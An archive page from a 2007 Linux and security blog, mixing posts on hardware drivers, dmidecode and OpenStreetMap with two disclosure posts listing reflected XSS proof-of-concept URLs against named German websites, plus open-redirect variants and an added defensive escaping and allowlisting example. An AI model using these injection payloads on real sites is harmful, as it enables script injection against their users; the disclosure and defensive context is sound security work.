Cross Site Scripting all over the internet

Friday, March 30. 2007, 14:58
It's terrifying how many sites there are out there with XSS issues.

http://www.netbeat.de/bestellen/domaincheck.html?<script>alert(1)</script>
http://www.netbeat.de/support/kommentare.html?name="><script>alert(1)</script>
http://www.symlink.ch/users.pl?unickname="><script>alert(1)</script>
http://www.stuttgart.de/sde/search.php?search=%22><script>alert%281%29</script>
http://www.holidayranking.de/search.html?searchSearchString="><script>alert(1)</script>
http://www.freecity.de/suche/index.phtml?gosearch=yes&words="><script>alert(1)</script>
http://search.netdoktor.com/results.html?qt="><script>alert(1)</script>&la=de
http://www.vfb.de/de/suche/index.php?words="><script>alert(1)</script>
http://www.dvd.de/dvd-and-date/alledvd.asp?strTxt="><script>alert(1)</script>


Note: All have been informed more than a week ago. I also had a bunch of others that got fixed after notification of the webmasters.

Napster and MPAA still unfixed.

Spring

Thursday, March 29. 2007, 22:32
Spring Pictures: No text, just some pictures here.

Linux-Infoday in Augsburg

Saturday, March 24. 2007, 12:58
I'm here at the Linux-Infotag 2007 of the Linux user group Augsburg. It's a small and cosy event. It seems there are a lot of Freifunk people (free WLAN networks) in Augsburg. On my way to Augsburg, fittingly, I had to switch trains in the Linux town Treuchtlingen.

I gave a talk about 3D desktops (Linux 3D-Slides, OpenDocument). I will stay for some more hours.
It's nice to see more local Linux events evolving.

Update: Some pictures from the LIT 2007

Driver for laptop cardreader

Tuesday, March 20. 2007, 14:19
My laptop (Samsung P35) has an internal card reader (SD and MemoryStick) made by Ricoh. Several other laptops have this device. It's internally connected as a PCMCIA device and shows up as RICOH Bay1Controller in pccardctl ident.

For years there was no way to get this thing running in Linux, which stopped me from doing projects like keeping a crypto key on a small SD card and inserting it at boot. Now, finally, someone did the job and reverse engineered the device: sdricohcs

In my first small tests, I could already download some photos from my digital camera's card. No problems so far. Now the only thing I'm really missing with Linux on my laptop is TV-Out (it works with the ATI binary drivers, but they are unstable like hell). I heard some Xorg devs are already working on it, so maybe I'll soon announce »nearly 100%« support for Linux on the Samsung P30/P35.

dmidecode - useful tool

Wednesday, March 14. 2007, 12:27
I wrote a few days ago (only in German) about my requests to the 1und1 support for information about the hardware of our root server (to complete the PCI ID database).

Now, after their first reply, I got another mail with more useful information: they pointed me to the tool dmidecode, which can find lots of information about the BIOS and the motherboard. I didn't know that before; it's also useful to find out the BIOS version on a running system.

Now, this looks like what I was looking for:
Handle 0x0002, DMI type 2, 8 bytes
Base Board Information
Manufacturer: FUJITSU SIEMENS
Product Name: D2030-A1

XSS on eplus.de

Monday, March 12. 2007, 19:09
Note: This is just a short form of a German article I posted today. E-Plus is a big German mobile telephony provider. I've found a bunch of XSS issues together with Alexander Brachmann (responsible disclosure: all reported to E-Plus beforehand, probably more to come).

For my English visitors, here are the URLs:
http://www.eplus.de/meta/shopsuche/suche_ausgabe.asp?suchwort="><script>alert(1)</script>
http://www.eplus.de/frame.asp?go=http://www.eplus.de/');alert(1);document.write('
http://www.eplus.de/frame.asp?go=');alert('

Already fixed ones:
http://www.eplus.de/frame.asp?go=http://www.google.de/
http://www.eplus.de/frame.asp?go=http://www.eplus.de@www.google.de
http://www.eplus.de/frame.asp?go=http://www.eplus.dedomain.com
http://www.eplus.de/frame.asp?go=http://www.eplus.de.mydomain.com
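As an added example (not code from this post, from E-Plus, or from any of the sites listed above), here is how both bug classes on this page are closed on the server side: the reflected search-term XSS from the URL list above is stopped by encoding for the HTML attribute context, and the frame.asp go parameter (which, as the payloads show, lands inside a single-quoted JavaScript string) gets a hostname allowlist plus proper JS string escaping. It assumes Node.js 10 or newer for the WHATWG URL class; all function and constant names are hypothetical.

```javascript
// Added example (not code from the original post or from E-Plus): defensive
// handling for the two bug classes above. Assumes Node.js 10+ (WHATWG URL).
// All function and constant names here are hypothetical.

// Encoder for a value placed inside a double-quoted HTML attribute, e.g. a
// search term echoed into <input value="...">. The "><script> payloads work
// only because a raw quote ends the attribute; encoded, the value stays text.
function escapeHtmlAttr(value) {
  return String(value)
    .replace(/&/g, '&amp;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;');
}

// Frame targets are compared on the parsed hostname, never on a string prefix.
// That rejects the three already-fixed tricks (userinfo "eplus.de@",
// "eplus.dedomain.com", "eplus.de.mydomain.com") and non-URL input.
const ALLOWED_HOSTS = new Set(['www.eplus.de']);

function safeFrameTarget(raw) {
  let url;
  try {
    url = new URL(String(raw));
  } catch (e) {
    return null;                       // not an absolute URL at all
  }
  if (url.protocol !== 'http:' && url.protocol !== 'https:') return null;
  if (url.username !== '' || url.password !== '') return null;
  if (!ALLOWED_HOSTS.has(url.hostname.toLowerCase())) return null;
  return url.href;
}

// A URL with an allowed host can still carry ');alert(1);document.write('
// in its path, so the host check alone does not make it safe to splice into
// a script. JSON.stringify escapes quotes and backslashes; \u003c keeps a
// literal </script> in the value from closing the script element.
function jsStringLiteral(s) {
  return JSON.stringify(String(s)).replace(/</g, '\\u003c');
}

// Inline script that hands the (validated) target to the page, with a fixed
// fallback when validation fails.
function frameTargetScript(raw) {
  const target = safeFrameTarget(raw) || 'http://www.eplus.de/';
  return 'var frameTarget = ' + jsStringLiteral(target) + ';';
}
```

The two checks are deliberately independent: the host allowlist decides where a frame may point, and the literal escaping makes sure that no value, allowed or not, can change the meaning of the script it is written into.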

Small things to help free software: Device IDs

Friday, March 9. 2007, 00:23
A thing people often say in the free software world: »I can't program, but I want to help out somewhere.«

There's one thing that's very simple to do for everyone using Linux. We have two tools called lspci and lsusb that look at the PCI/USB bus for installed devices. Each device has an ID, consisting of a vendor ID and a product ID. Everyone can check whether all of their own hardware is detected. For lspci, first run update-pciids, then lspci -v. Each »Unknown« represents some ID that's not in pci.ids. Report the exact device model name to the interface on http://pciids.sourceforge.net/.
For lsusb, run update-usbids and attach all USB devices you can find. lsusb doesn't show »Unknown«; if there's only a vendor name after the device number, then the ID is unknown. The usb.ids database is much more incomplete than the PCI database. They don't have such a fancy interface as pciids; just send it to the current maintainer (listed in the file, usually at /usr/share/misc/usb.ids or /usr/share/usb.ids).

More OpenStreetMapping

Friday, March 2. 2007, 01:23
I've been actively participating in the OpenStreetMap project for about a week. Today I tagged two roads Google Maps doesn't know about (so at least in one very small part of the world OSM is more accurate than Google).
They're the Euro- and D-Mark street in Murrhardt. And yes, they invent stupid street names here.

Early look at free nvidia driver

Thursday, March 1. 2007, 22:48
Binary drivers (BLOBs) are imho a huge problem for free software. Nvidia, a leading graphics company, has produced binary Linux drivers for a long time, and there was no way to get free software 3D support on their cards.
A group of people is working at the moment on a free Nvidia driver; the project is called nouveau. I now had a chance to test the nouveau driver on an Nvidia card (nv43). It doesn't do much at the moment, but at least it runs glxgears almost smoothly.

It's nice to see development on that front. We made a small video of glxgears running on nouveau. Oh, for all those who can't play Theora, I put it up on YouTube (but seriously, I was just curious how YouTube works and whether it accepts Theora).

Some experimental nouveau-ebuilds, maintained by pq from the nouveau-project, are here:
svn co https://svn.hboeck.de/nouveau-overlay